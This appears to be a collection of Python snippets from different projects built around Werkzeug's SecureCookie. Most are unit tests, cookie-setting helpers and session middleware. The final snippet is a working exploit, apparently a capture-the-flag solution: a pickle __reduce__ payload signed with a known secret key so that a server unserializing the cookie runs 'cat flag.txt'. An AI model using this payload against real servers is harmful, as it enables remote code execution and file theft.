def test_basic_support(): c = SecureCookie(secret_key=b'foo') assert c.new assert not c.modified assert not c.should_save c['x'] = 42 assert c.modified assert c.should_save s = c.serialize() c2 = SecureCookie.unserialize(s, b'foo') assert c is not c2 assert not c2.new assert not c2.modified assert not c2.should_save assert c2 == c c3 = SecureCookie.unserialize(s, b'wrong foo') assert not c3.modified assert not c3.new assert c3 == {} c4 = SecureCookie({'x': 42}, 'foo') c4_serialized = c4.serialize() assert SecureCookie.unserialize(c4_serialized, 'foo') == c4
def test_basic_support(): c = SecureCookie(secret_key=b"foo") assert c.new assert not c.modified assert not c.should_save c["x"] = 42 assert c.modified assert c.should_save s = c.serialize() c2 = SecureCookie.unserialize(s, b"foo") assert c is not c2 assert not c2.new assert not c2.modified assert not c2.should_save assert c2 == c c3 = SecureCookie.unserialize(s, b"wrong foo") assert not c3.modified assert not c3.new assert c3 == {} c4 = SecureCookie({"x": 42}, "foo") c4_serialized = c4.serialize() assert SecureCookie.unserialize(c4_serialized, "foo") == c4
def saveOAuthToken(next, token, secret, max_age=3000): secretKey = current_app.config['SECRET_KEY'].encode('utf-8') data = SecureCookie({"token": token, "secret": secret}, secretKey) expires = datetime.utcnow() + timedelta(seconds=max_age) resp = make_response(next) resp.set_cookie('zapfauth_token', data.serialize(), expires=expires) return resp
def fake_login(request): if request.method == 'GET': return Response("FAKE LOGIN", mimetype="text/html") elif request.method == 'POST': response = Response("LOGGED IN", mimetype="text/html") cookie = SecureCookie({"logged_in": True}, SECRET_KEY) response.set_cookie('session_data', cookie.serialize()) return response
def set_gaema_user(service, user): gaema_user_key = GAEMA_USER_KEY_FORMAT % service if hasattr(settings, "GAEMA_STORAGE") and settings.GAEMA_STORAGE == "cookie": secure_cookie = SecureCookie(user, secret_key=settings.SECRET_KEY) user_data = secure_cookie.serialize() set_cookie(gaema_user_key, user_data) else: from kay.sessions import renew_session renew_session(local.request) local.request.session[gaema_user_key] = user local.request.session.modified = True
def set_to_cookie(req_response, cookie, key, value): cookie_data = request.cookies.get(cookie, None) if cookie_data is None: cookie_obj = SecureCookie(secret_key=app.config["SECRET_KEY"]) else: cookie_obj = SecureCookie.unserialize(cookie_data, app.config["SECRET_KEY"]) cookie_obj[key] = value all_cookies = session.get(ALL_COOKIES_KEY, []) if cookie not in all_cookies: all_cookies.append(cookie) session[ALL_COOKIES_KEY] = all_cookies req_response.set_cookie(cookie, cookie_obj.serialize())
def post_process(self, environ, headers): user = User.get_current() if not user: cookies = http.parse_cookie(environ) if self.name in cookies: raw = http.dump_cookie(self.name, '', expires=1) headers.append((utils.to_native('Set-Cookie'), raw)) return cookie = SecureCookie({ 'uid': user.id, 'session_token': user.get_session_token(), }, self.secret) raw = http.dump_cookie(self.name, cookie.serialize(), expires=self.expires, max_age=self.max_age) headers.append((utils.to_native('Set-Cookie'), raw))
def post_process(self, environ, headers): user = User.get_current() if not user: cookies = http.parse_cookie(environ) if self.name in cookies: raw = http.dump_cookie(self.name, '', expires=1) headers.append(('Set-Cookie', raw)) return cookie = SecureCookie( { 'uid': user.id, 'session_token': user.get_session_token(), }, self.secret) raw = http.dump_cookie(self.name, cookie.serialize(), expires=self.expires, max_age=self.max_age) headers.append(('Set-Cookie', raw))
def test_basic_support(self): c = SecureCookie(secret_key=b'foo') assert c.new assert not c.modified assert not c.should_save c['x'] = 42 assert c.modified assert c.should_save s = c.serialize() c2 = SecureCookie.unserialize(s, b'foo') assert c is not c2 assert not c2.new assert not c2.modified assert not c2.should_save self.assert_equal(c2, c) c3 = SecureCookie.unserialize(s, b'wrong foo') assert not c3.modified assert not c3.new self.assert_equal(c3, {})
def test_basic_support(self): c = SecureCookie(secret_key='foo') assert c.new assert not c.modified assert not c.should_save c['x'] = 42 assert c.modified assert c.should_save s = c.serialize() c2 = SecureCookie.unserialize(s, 'foo') assert c is not c2 assert not c2.new assert not c2.modified assert not c2.should_save assert c2 == c c3 = SecureCookie.unserialize(s, 'wrong foo') assert not c3.modified assert not c3.new assert c3 == {}
def test_basic_support(self): c = SecureCookie(secret_key="foo") assert c.new print c.modified, c.should_save assert not c.modified assert not c.should_save c["x"] = 42 assert c.modified assert c.should_save s = c.serialize() c2 = SecureCookie.unserialize(s, "foo") assert c is not c2 assert not c2.new assert not c2.modified assert not c2.should_save assert c2 == c c3 = SecureCookie.unserialize(s, "wrong foo") assert not c3.modified assert not c3.new assert c3 == {}
import os import subprocess from werkzeug.contrib.securecookie import SecureCookie class RCE(object): def __reduce__(self): return (subprocess.check_output, (['cat','flag.txt'],)) SECRET_KEY = 'superdupersecretflagonkey' payload = {'name': RCE() , 'username': '******'} x = SecureCookie(payload, SECRET_KEY) value = x.serialize() print(value)